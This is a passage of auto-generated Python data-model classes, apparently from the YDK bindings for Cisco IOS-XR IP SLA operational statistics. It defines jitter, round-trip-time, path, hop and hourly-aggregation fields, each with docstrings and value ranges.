('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
('jitter', YLeaf(YType.uint32, 'jitter')),
('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
])
self.source_address = None
self.dest_address = None
self.hop_address = None
self.packet_interval = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.packet_count = None
self.packet_loss_count = None
self.out_of_sequence_count = None
self.discarded_sample_count = None
self.verify_errors_count = None
self.dropped_error_count = None
self.jitter = None
self.pos_jitter_sum = None
self.pos_jitter_sum2 = None
self.pos_jitter_min = None
self.pos_jitter_max = None
self.pos_jitter_count = None
self.neg_jitter_sum = None
self.neg_jitter_min = None
self.neg_jitter_max = None
self.neg_jitter_sum2 = None
self.neg_jitter_count = None
self._segment_path = lambda: "icmp-path-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
"""
udp jitter stats
.. attribute:: jitter_in
Input Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter_out
Output Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_sd
Packets lost in source to destination (SD) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_ds
Packets lost in destination to source (DS) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_out_of_sequence
Packets out of sequence
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_mia
Packets missing in action (cannot determine if theywere lost in SD or DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_skipped
Packets which are skipped
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_late_arrivals
Packets arriving late
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_invalid_tstamp
Packets with bad timestamps
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_errors_count
Number of internal errors
**type**\: int
**range:** 0..4294967295
.. attribute:: busies_count
Number of busies
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_sd_sum2
Sum of squares of positive jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_sd_min
Minimum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_max
Maximum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_count
Number of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_sd_sum2
Sum of squares of negative jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_sd_min
Minimum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_max
Maximum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_count
Number of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_ds_sum2
Sum of squares of positive jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_ds_min
Minimum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_max
Maximum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_count
Number of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_ds_sum2
Sum of squares of negative jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_ds_min
Minimum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_max
Maximum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_count
Number of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_count
Number of probe/probe\-response pairs used to compute one\-way statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_min
Minimum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_max
Maximum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum
Sum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum2
Sum of squares of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: one_way_ds_min
Minimum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_max
Maximum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum
Sum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum2
Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.UdpJitterStats, self).__init__()
self.yang_name = "udp-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
('busies_count', YLeaf(YType.uint32, 'busies-count')),
('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
])
self.jitter_in = None
self.jitter_out = None
self.packet_loss_sd = None
self.packet_loss_ds = None
self.packet_out_of_sequence = None
self.packet_mia = None
self.packet_skipped = None
self.packet_late_arrivals = None
self.packet_invalid_tstamp = None
self.internal_errors_count = None
self.busies_count = None
self.positive_sd_sum = None
self.positive_sd_sum2 = None
self.positive_sd_min = None
self.positive_sd_max = None
self.positive_sd_count = None
self.negative_sd_sum = None
self.negative_sd_sum2 = None
self.negative_sd_min = None
self.negative_sd_max = None
self.negative_sd_count = None
self.positive_ds_sum = None
self.positive_ds_sum2 = None
self.positive_ds_min = None
self.positive_ds_max = None
self.positive_ds_count = None
self.negative_ds_sum = None
self.negative_ds_sum2 = None
self.negative_ds_min = None
self.negative_ds_max = None
self.negative_ds_count = None
self.one_way_count = None
self.one_way_sd_min = None
self.one_way_sd_max = None
self.one_way_sd_sum = None
self.one_way_sd_sum2 = None
self.one_way_ds_min = None
self.one_way_ds_max = None
self.one_way_ds_sum = None
self.one_way_ds_sum2 = None
self._segment_path = lambda: "udp-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class Hours(Entity):
"""
Table of statistics aggregated over 1\-hour
intervals
.. attribute:: hour
Statistics aggregated for a 1\-hour interval
**type**\: list of :py:class:`Hour <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours, self).__init__()
self.yang_name = "hours"
self.yang_parent_name = "aggregated"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("hour", ("hour", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour))])
self._leafs = OrderedDict()
self.hour = YList(self)
self._segment_path = lambda: "hours"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours, [], name, value)
class Hour(Entity):
"""
Statistics aggregated for a 1\-hour
interval
.. attribute:: hour_index (key)
Hour Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: distributed
Statistics aggregated on distribution value intervals for in 1\-hour intervals
**type**\: :py:class:`Distributed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed>`
.. attribute:: non_distributed
Statistics aggregated for the total range of values in 1\-hour intervals
**type**\: :py:class:`NonDistributed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour, self).__init__()
self.yang_name = "hour"
self.yang_parent_name = "hours"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hour_index']
self._child_container_classes = OrderedDict([("distributed", ("distributed", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed)), ("non-distributed", ("non_distributed", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('hour_index', YLeaf(YType.int32, 'hour-index')),
])
self.hour_index = None
self.distributed = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed()
self.distributed.parent = self
self._children_name_map["distributed"] = "distributed"
self._children_yang_names.add("distributed")
self.non_distributed = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed()
self.non_distributed.parent = self
self._children_name_map["non_distributed"] = "non-distributed"
self._children_yang_names.add("non-distributed")
self._segment_path = lambda: "hour" + "[hour-index='" + str(self.hour_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour, ['hour_index'], name, value)
class Distributed(Entity):
"""
Statistics aggregated on distribution
value intervals for in 1\-hour intervals
.. attribute:: paths
Table of paths identified in the 1\-hour interval
**type**\: :py:class:`Paths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths>`
.. attribute:: target
Distribution statistics for the target node
**type**\: :py:class:`Target <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed, self).__init__()
self.yang_name = "distributed"
self.yang_parent_name = "hour"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("paths", ("paths", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths)), ("target", ("target", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.paths = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths()
self.paths.parent = self
self._children_name_map["paths"] = "paths"
self._children_yang_names.add("paths")
self.target = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target()
self.target.parent = self
self._children_name_map["target"] = "target"
self._children_yang_names.add("target")
self._segment_path = lambda: "distributed"
class Paths(Entity):
"""
Table of paths identified in the 1\-hour
interval
.. attribute:: path
Paths identified in a 1\-hour interval
**type**\: list of :py:class:`Path <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths, self).__init__()
self.yang_name = "paths"
self.yang_parent_name = "distributed"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("path", ("path", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path))])
self._leafs = OrderedDict()
self.path = YList(self)
self._segment_path = lambda: "paths"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths, [], name, value)
class Path(Entity):
"""
Paths identified in a 1\-hour interval
.. attribute:: path_index (key)
Path Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: hops
Table of hops for a particular path
**type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path, self).__init__()
self.yang_name = "path"
self.yang_parent_name = "paths"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['path_index']
self._child_container_classes = OrderedDict([("hops", ("hops", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('path_index', YLeaf(YType.int32, 'path-index')),
])
self.path_index = None
self.hops = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops()
self.hops.parent = self
self._children_name_map["hops"] = "hops"
self._children_yang_names.add("hops")
self._segment_path = lambda: "path" + "[path-index='" + str(self.path_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path, ['path_index'], name, value)
class Hops(Entity):
"""
Table of hops for a particular path
.. attribute:: hop
1\-hour aggregated statistics for a hop in a path\-enabled operation
**type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops, self).__init__()
self.yang_name = "hops"
self.yang_parent_name = "path"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("hop", ("hop", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop))])
self._leafs = OrderedDict()
self.hop = YList(self)
self._segment_path = lambda: "hops"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops, [], name, value)
class Hop(Entity):
"""
1\-hour aggregated statistics for a
hop in a path\-enabled operation
.. attribute:: hop_index (key)
Hop Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: distribution_intervals
Table of distribution intervals for a particular hop
**type**\: :py:class:`DistributionIntervals <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop, self).__init__()
self.yang_name = "hop"
self.yang_parent_name = "hops"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hop_index']
self._child_container_classes = OrderedDict([("distribution-intervals", ("distribution_intervals", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('hop_index', YLeaf(YType.int32, 'hop-index')),
])
self.hop_index = None
self.distribution_intervals = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals()
self.distribution_intervals.parent = self
self._children_name_map["distribution_intervals"] = "distribution-intervals"
self._children_yang_names.add("distribution-intervals")
self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop, ['hop_index'], name, value)
class DistributionIntervals(Entity):
"""
Table of distribution intervals for a particular
hop
.. attribute:: distribution_interval
1\-hour aggregated statistics for a hop in a path\-enabled operation
**type**\: list of :py:class:`DistributionInterval <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals, self).__init__()
self.yang_name = "distribution-intervals"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("distribution-interval", ("distribution_interval", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval))])
self._leafs = OrderedDict()
self.distribution_interval = YList(self)
self._segment_path = lambda: "distribution-intervals"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals, [], name, value)
class DistributionInterval(Entity):
"""
1\-hour aggregated statistics for a hop in a
path\-enabled operation
.. attribute:: distribution_index (key)
Distribution Interval
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval, self).__init__()
self.yang_name = "distribution-interval"
self.yang_parent_name = "distribution-intervals"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['distribution_index']
self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('distribution_index', YLeaf(YType.int32, 'distribution-index')),
])
self.distribution_index = None
self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats()
self.common_stats.parent = self
self._children_name_map["common_stats"] = "common-stats"
self._children_yang_names.add("common-stats")
self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats()
self.specific_stats.parent = self
self._children_name_map["specific_stats"] = "specific-stats"
self._children_yang_names.add("specific-stats")
self._segment_path = lambda: "distribution-interval" + "[distribution-index='" + str(self.distribution_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval, ['distribution_index'], name, value)
class CommonStats(Entity):
"""
Common Stats
.. attribute:: operation_time
Operation Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
Return code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: update_count
Number of updates processed
**type**\: int
**range:** 0..4294967295
.. attribute:: ok_count
Number of updates with Okay return code
**type**\: int
**range:** 0..4294967295
.. attribute:: disconnect_count
Number of updates with Disconnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: timeout_count
Number of updates with Timeout return code
**type**\: int
**range:** 0..4294967295
.. attribute:: busy_count
Number of updates with Busy return code
**type**\: int
**range:** 0..4294967295
.. attribute:: no_connection_count
Number of updates with NotConnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_count
Number of updates with Dropped return code
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_error_count
Number of updates with InternalError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: sequence_error_count
Number of updates with SeqError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_error_count
Number of updates with VerifyError return code
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats, self).__init__()
self.yang_name = "common-stats"
self.yang_parent_name = "distribution-interval"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('operation_time', YLeaf(YType.uint64, 'operation-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('update_count', YLeaf(YType.uint32, 'update-count')),
('ok_count', YLeaf(YType.uint32, 'ok-count')),
('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
('busy_count', YLeaf(YType.uint32, 'busy-count')),
('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
])
